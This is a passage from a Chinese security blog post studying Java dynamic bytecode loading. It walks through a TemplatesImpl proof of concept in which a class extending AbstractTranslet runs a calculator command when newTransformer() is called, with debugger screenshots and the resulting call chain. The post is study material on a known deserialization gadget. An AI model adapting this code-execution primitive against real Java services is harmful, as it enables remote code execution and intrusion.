class="line">    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception&#123;</span><br><span class="line">        Field filed = obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        filed.setAccessible(true);</span><br><span class="line">        filed.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>那么正常情况下，我们这里应该已经可以正常进行命令执行</p>
<p>那么我们这里编写一个命令执行的恶意代码类：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">public class Test &#123;</span><br><span class="line">    static &#123;</span><br><span class="line">        try &#123;</span><br><span class="line">            Runtime.getRuntime().exec(&quot;calc&quot;);</span><br><span class="line"></span><br><span class="line">        &#125;catch (Exception e)&#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>然后编译一下把字节码base64编码一下：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">public class bianma &#123;</span><br><span class="line">    public static void main(String[] args) &#123;</span><br><span class="line">        String filePath = &quot;D:\\MAVEN\\maven-repository\\cc6\\cc61\\src\\main\\java\\leijiazai\\HelloTemplatesImpl.class\\&quot;;</span><br><span class="line"></span><br><span class="line">        try &#123;</span><br><span class="line">            byte[] classBytes = readClassFile(filePath);</span><br><span class="line">            String base64Encoded = convertToBase64(classBytes);</span><br><span class="line">            System.out.println(base64Encoded);</span><br><span class="line">        &#125; catch (IOException e) &#123;</span><br><span class="line">            e.printStackTrace();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private static byte[] readClassFile(String filePath) throws IOException &#123;</span><br><span class="line">        try (FileInputStream fis = new FileInputStream(filePath);</span><br><span class="line">             ByteArrayOutputStream baos = new ByteArrayOutputStream()) &#123;</span><br><span class="line">            byte[] buffer = new byte[4096];</span><br><span class="line">            int bytesRead;</span><br><span class="line">            while ((bytesRead = fis.read(buffer)) != -1) &#123;</span><br><span class="line">                baos.write(buffer, 0, bytesRead);</span><br><span class="line">            &#125;</span><br><span class="line">            return baos.toByteArray();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    private static String convertToBase64(byte[] data) &#123;</span><br><span class="line">        return Base64.getEncoder().encodeToString(data);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>我们直接把我们的POC运行一下：</p>
<p>但是并没有执行命令</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175110466.png"
                      alt="image-20230802175110466"
                ></p>
<p>然后是报了一个空指针错误在defineTranslectClasses里面</p>
<p>但是这个不太好找</p>
<p>然后我们这里打断点跟进调试一下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175023651.png"
                      alt="image-20230802175023651"
                ></p>
<p>跟进</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175259884.png"
                      alt="image-20230802175259884"
                ></p>
<p>然后我们可以看到这里类加载是已经成功了</p>
<p>然后我们继续跟进</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802175419393.png"
                      alt="image-20230802175419393"
                ></p>
<p>然后我们可以看到就是在这个if判断里面报了一个空指针错误</p>
<p>然后这个if就是检查我们传入字节码是不是<code>ABSTRACT_TRANSLET</code>的子类</p>
<p>然后是的话会对<code>_transletIndex</code>进行一个赋值，不是的话，就会跳转到我们报空指针错误的地方</p>
<p>那我们这里解决办法有两个：</p>
<p>1、给_auxCLasses赋值，解决这个空指针报错</p>
<p>2、使if判断为真也就是我们传入的字节码为<code>ABSTRACT_TRANSLET</code>的子类</p>
<p>但是我们往下看还有一个if判断：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">if (_transletIndex &lt; 0) &#123;</span><br><span class="line">             ErrorMsg err= new ErrorMsg(ErrorMsg.NO_MAIN_TRANSLET_ERR, _name);</span><br><span class="line">             throw new TransformerConfigurationException(err.toString());</span><br><span class="line">         &#125;</span><br></pre></td></tr></table></figure></div>

<p>这里也就是<code>_transletIndex</code> 值小于0就直接抛出异常</p>
<p>而且我们现在的<code>_transletIndex</code> 值是-1</p>
<p>所以我们给_auxCLasses赋值不可行，因为这样无法过第二个if，仍然会报错</p>
<p>所以我们这里要使我们传入的字节码为<code>ABSTRACT_TRANSLET</code>的子类</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802180950718.png"
                      alt="image-20230802180950718"
                ></p>
<p>跟进到这个类里面</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802180931720.png"
                      alt="image-20230802180931720"
                ></p>
<p>可以看到这个类是一个抽象类，那他的子类就要实现它的抽象方法</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802181053462.png"
                      alt="image-20230802181053462"
                ></p>
<p>所以我们构造的恶意类就要实现这个transform抽象方法</p>
<p>那我们这里重新构造一个恶意类</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">public class HelloTemplatesImpl extends AbstractTranslet &#123;</span><br><span class="line">    public void transform(DOM document, SerializationHandler[] handlers)</span><br><span class="line">            throws TransletException &#123;&#125;</span><br><span class="line">    public void transform(DOM document, DTMAxisIterator iterator,</span><br><span class="line">                          SerializationHandler handler) throws TransletException &#123;&#125;</span><br><span class="line">    public HelloTemplatesImpl() throws IOException &#123;</span><br><span class="line">        Runtime.getRuntime().exec(&quot;calc&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>那么我们的POC就可以构造为：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">public class blog &#123;</span><br><span class="line">    public static void main(String[] args) throws Exception &#123;</span><br><span class="line">        Templates templates = new TemplatesImpl();</span><br><span class="line">        byte[] code = Files.readAllBytes(Paths.get(&quot;D:\\MAVEN\\maven-repository\\cc6\\cc61\\src\\main\\java\\leijiazai\\HelloTemplatesImpl.class&quot;));</span><br><span class="line">        byte[][] codes = &#123;code&#125;;</span><br><span class="line">        setFieldValue(templates, &quot;_bytecodes&quot;, codes);</span><br><span class="line">        setFieldValue(templates,&quot;_name&quot;,&quot;111&quot;);</span><br><span class="line">        setFieldValue(templates,&quot;_tfactory&quot;,new TransformerFactoryImpl());</span><br><span class="line">        templates.newTransformer();</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">    public static void setFieldValue(Object obj, String fieldName, Object value) throws Exception&#123;</span><br><span class="line">        Field filed = obj.getClass().getDeclaredField(fieldName);</span><br><span class="line">        filed.setAccessible(true);</span><br><span class="line">        filed.set(obj, value);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230802181259643.png"
                      alt="image-20230802181259643"
                ></p>
<p>可以看到已经成功运行了。但是这里我们并没有进行newInstance()，但是依然弹出了计算器，</p>
<p>那我们这里就打断点整体分析一下：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194144950.png"
                      alt="image-20230731194144950"
                ></p>
<p>可以看到这里是显调用了run方法创建一个<code>TransletClassLoader</code> 对象对象</p>
<p>继续跟进：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194232897.png"
                      alt="image-20230731194232897"
                ></p>
<p>由于我们这里只传入了一个字节数组，所以这里的_bytecodes.length的值就为1，赋值给classCount</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_class = new Class[classCount];</span><br></pre></td></tr></table></figure></div>

<p>继续跟进：</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194642542.png"
                      alt="image-20230731194642542"
                ></p>
<p>可以看到这里第一轮循环，处理了我们传入的字节数组，然后经过if判断将i的值0赋值给了_transletIndex</p>
<p>然后就步出回到了getTransletInstance()</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="https://jublog.oss-cn-beijing.aliyuncs.com/image/image-20230731194955697.png"
                      alt="image-20230731194955697"
                ></p>
<p>可以看到这里调用了_class[0]的newInstance()方法，弹出计算器</p>
<p>所以这就是我们为什么不用再newinstace的原因了。</p>
<p>利用链：</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">TemplatesImpl#newTransformer() -&gt;</span><br><span class="line">TemplatesImpl#getTransletInstance() -&gt; </span><br><span class="line">TemplatesImpl#defineTransletClasses()-&gt; </span><br><span class="line">TransletClassLoader#defineClass()</span><br></pre></td></tr></table></figure></div>

<h1 id="利用BCEL-ClassLoader加载字节码"><a href="#利用BCEL-ClassLoader加载字节码" class="headerlink" title="利用BCEL ClassLoader加载字节码"></a>利用BCEL ClassLoader加载字节码</h1><p>这里等分析完cc3再来学习</p>
<p>这里可以参考P牛的文章：</p>
<p><a class="link"   target="_blank" rel="noopener" href="https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html" >https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html <i class="fa-regular fa-arrow-up-right-from-square fa-sm"></i></a></p>

            </div>

            
                <div class="post-copyright-info">
                    <div class="article-copyright-info-container">
    <ul>
        <li><strong>标题:</strong> java动态加载字节码</li>
        <li><strong>作者:</strong> GTL-JU</li>
        <li><strong>创建于:</strong> 2023-07-31 20:49:24</li>
        
            <li>
                <strong>更新于:</strong> 2023-08-02 20:06:28
            </li>
        
        <li>
            <strong>链接:</strong> https://gtl-ju.github.io/2023/07/31/java动态加载字节码/
        </li>
        <li>
            <strong>版权声明:</strong> 本文章采用 <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">CC BY-NC-SA 4.0</a> 进行许可。
        </li>
    </ul>
</div>

                </div>
            

            
                <ul class="post-tags-box">
                    
                        <li class="tag-item">
                            <a href="/tags/java/">#java</a>&nbsp;
                        </li>
                    
                </ul>
            

            

            
                <div class="article-nav">
                    
                        <div class="article-prev">
                            <a class="prev"
                            rel="prev"
                            href="/2023/08/02/CommonCollections3%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/"
                            >
                                <span class="left arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-left"></i>
                                </span>
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">CommonCollections3利用链分析</span>
                                    <span class="post-nav-item">上一篇</span>
                                </span>
                            </a>
                        </div>
                    
                    
                        <div class="article-next">
                            <a class="next"
                            rel="next"
                            href="/2023/07/26/cc6%E5%88%A9%E7%94%A8%E9%93%BE%E5%88%86%E6%9E%90/"
                            >
                                <span class="title flex-center">
                                    <span class="post-nav-title-item">CommonCollections6利用链分析</span>
                                    <span class="post-nav-item">下一篇</span>
                                </span>
                                <span class="right arrow-icon flex-center">
                                    <i class="fa-solid fa-chevron-right"></i>
                                </span>
                            </a>
                        </div>
                    
                </div>
            


            
        </div>

        
            <div class="toc-content-container">
                <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">此页目录</div>
        <div class="page-title">java动态加载字节码</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%80%E3%80%81%E5%89%8D%E8%A8%80"><span class="nav-text">一、前言</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%BA%8C%E3%80%81java%E5%AD%97%E8%8A%82%E7%A0%81"><span class="nav-text">二、java字节码</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E4%B8%89%E3%80%81ClassLoader%EF%BC%88%E7%B1%BB%E5%8A%A0%E8%BD%BD%E5%99%A8%EF%BC%89"><span class="nav-text">三、ClassLoader（类加载器）</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#classLoader%E7%9A%84%E5%88%86%E7%B1%BB"><span class="nav-text">classLoader的分类</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%8F%8C%E4%BA%B2%E5%A7%94%E6%B4%BE%E6%9C%BA%E5%88%B6"><span class="nav-text">双亲委派机制</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%B1%BB%E5%8A%A0%E8%BD%BD%E7%9A%84%E6%96%B9%E5%BC%8F"><span class="nav-text">类加载的方式</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%B1%BB%E5%8A%A0%E8%BD%BD%E7%9A%84%E8%BF%87%E7%A8%8B"><span class="nav-text">类加载的过程</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%9B%9B%E3%80%81%E5%8A%A8%E6%80%81%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81"><span class="nav-text">四、动态加载字节码</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#URLClassLoader%E5%8A%A0%E8%BD%BD%E8%BF%9C%E7%A8%8Bclass%E6%96%87%E4%BB%B6"><span class="nav-text">URLClassLoader加载远程class文件</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ClassLoader-defineClass-%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81"><span class="nav-text">ClassLoader#defineClass() 加载字节码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%88%A9%E7%94%A8TemplatesImpl%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81"><span class="nav-text">利用TemplatesImpl加载字节码</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E5%88%A9%E7%94%A8BCEL-ClassLoader%E5%8A%A0%E8%BD%BD%E5%AD%97%E8%8A%82%E7%A0%81"><span class="nav-text">利用BCEL ClassLoader加载字节码</span></a></li></ol>

    </div>
</div>
            </div>
        
    </div>
</div>


                

            </div>
            
            

        </div>

        <div class="main-content-footer">
            <footer class="footer">
    <div class="info-container">
        <div class="copyright-info">
            &copy;
            
              <span>2023</span>
              -
            
            2024&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">GTL-JU</a>
        </div>
        
            <script async data-pjax src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
            <div class="website-count info-item">
                
                    <span id="busuanzi_container_site_uv" class="busuanzi_container_site_uv">
                        访问人数&nbsp;<span id="busuanzi_value_site_uv" class="busuanzi_value_site_uv"></span>
                    </span>
                
                
                    <span id="busuanzi_container_site_pv" class="busuanzi_container_site_pv">
                        总访问量&nbsp;<span id="busuanzi_value_site_pv" class="busuanzi_value_site_pv"></span>
                    </span>
                
            </div>
        
        <div class="theme-info info-item">
            <span class="powered-by-container">由 <?xml version="1.0" encoding="utf-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" id="圖層_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="1rem" height="1rem" viewBox="0 0 512 512" enable-background="new 0 0 512 512" xml:space="preserve"><path fill="#0E83CD" d="M256.4,25.8l-200,115.5L56,371.5l199.6,114.7l200-115.5l0.4-230.2L256.4,25.8z M349,354.6l-18.4,10.7l-18.6-11V275H200v79.6l-18.4,10.7l-18.6-11v-197l18.5-10.6l18.5,10.8V237h112v-79.6l18.5-10.6l18.5,10.8V354.6z"/></svg><a target="_blank" href="https://hexo.io">Hexo</a> 驱动</span>
                <br>
            <span class="theme-version-container">主题&nbsp;<a class="theme-version" target="_blank" href="https://github.com/EvanNotFound/hexo-theme-redefine">Redefine v2.1.0</a>
        </div>
        
        
        
            <div id="start_div" style="display:none">
                2023/4/8 0:0:0
            </div>
            <div>
                博客已运行 <span class="odometer" id="runtime_days" ></span> 天 <span class="odometer" id="runtime_hours"></span> 小时 <span class="odometer" id="runtime_minutes"></span> 分钟 <span class="odometer" id="runtime_seconds"></span> 秒
            </div>
        
        
        
            <script async data-pjax>
                try {
                    function odometer_init() {
                    const elements = document.querySelectorAll('.odometer');
                    elements.forEach(el => {
                        new Odometer({
                            el,
                            format: '( ddd).dd',
                            duration: 200
                        });
                    });
                    }
                    odometer_init();
                } catch (error) {}
            </script>
        
        
        
    </div>  
</footer>
        </div>
    </div>

    
        <div class="post-tools">
            <div class="post-tools-container">
    <ul class="article-tools-list">
        <!-- TOC aside toggle -->
        
            <li class="right-bottom-tools page-aside-toggle">
                <i class="fa-regular fa-outdent"></i>
            </li>
        

        <!-- go comment -->
        
    </ul>
</div>

        </div>
    

    <div class="right-side-tools-container">
        <div class="side-tools-container">
    <ul class="hidden-tools-list">
        <li class="right-bottom-tools tool-font-adjust-plus flex-center">
            <i class="fa-regular fa-magnifying-glass-plus"></i>
        </li>

        <li class="right-bottom-tools tool-font-adjust-minus flex-center">
            <i class="fa-regular fa-magnifying-glass-minus"></i>
        </li>

        <li class="right-bottom-tools tool-expand-width flex-center">
            <i class="fa-regular fa-expand"></i>
        </li>

        <li class="right-bottom-tools tool-dark-light-toggle flex-center">
            <i class="fa-regular fa-moon"></i>
        </li>

        <!-- rss -->
        

        

        <li class="right-bottom-tools tool-scroll-to-bottom flex-center">
            <i class="fa-regular fa-arrow-down"></i>
        </li>
    </ul>

    <ul class="visible-tools-list">
        <li class="right-bottom-tools toggle-tools-list flex-center">
            <i class="fa-regular fa-cog fa-spin"></i>
        </li>
        
            <li class="right-bottom-tools tool-scroll-to-top flex-center">
                <i class="arrow-up fas fa-arrow-up"></i>
                <span class="percent"></span>
            </li>
        
    </ul>
</div>

    </div>

    <div class="image-viewer-container">
    <img src="">
</div>


    
        <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
          <span class="search-input-field-pre">
            <i class="fa-solid fa-keyboard"></i>
          </span>
            <div class="search-input-container">
                <input autocomplete="off"
                       autocorrect="off"
                       autocapitalize="off"
                       placeholder="搜索..."
                       spellcheck="false"
                       type="search"
                       class="search-input"
                >
            </div>
            <span class="popup-btn-close">
                <i class="fa-solid fa-times"></i>
            </span>
        </div>
        <div id="search-result">
            <div id="no-result">
                <i class="fa-solid fa-spinner fa-spin-pulse fa-5x fa-fw"></i>
            </div>
        </div>
    </div>
</div>

    


</main>




<script src="/js/utils.js"></script>

<script src="/js/main.js"></script>

<script src="/js/layouts/navbarShrink.js"></script>

<script src="/js/tools/scrollTopBottom.js"></script>

<script src="/js/tools/lightDarkSwitch.js"></script>



    
<script src="/js/tools/localSearch.js"></script>




    
<script src="/js/tools/codeBlock.js"></script>




    
<script src="/js/layouts/lazyload.js"></script>




    
<script src="/js/tools/runtime.js"></script>

    
<script src="/js/layouts/odometer.min.js"></script>

    
<link rel="stylesheet" href="/assets/odometer-theme-minimal.css">




  
<script src="/js/libs/Typed.min.js"></script>

  
<script src="/js/plugins/typed.js"></script>







<div class="post-scripts pjax">
    
        
<script src="/js/tools/tocToggle.js"></script>

<script src="/js/libs/anime.min.js"></script>

<script src="/js/layouts/toc.js"></script>

<script src="/js/plugins/tabs.js"></script>

    
</div>


    
<script src="/js/libs/pjax.min.js"></script>

<script>
    window.addEventListener('DOMContentLoaded', () => {
        window.pjax = new Pjax({
            selectors: [
                'head title',
                '.page-container',
                '.pjax'
            ],
            history: true,
            debug: false,
            cacheBust: false,
            timeout: 0,
            analytics: false,
            currentUrlFullReload: false,
            scrollRestoration: false,
            // scrollTo: true,
        });

        document.addEventListener('pjax:send', () => {
            Global.utils.pjaxProgressBarStart();
        });

        document.addEventListener('pjax:complete', () => {
            Global.utils.pjaxProgressBarEnd();
            window.pjax.executeScripts(document.querySelectorAll('script[data-pjax], .pjax script'));
            Global.refresh();
        });
    });
</script>




</body>
</html>
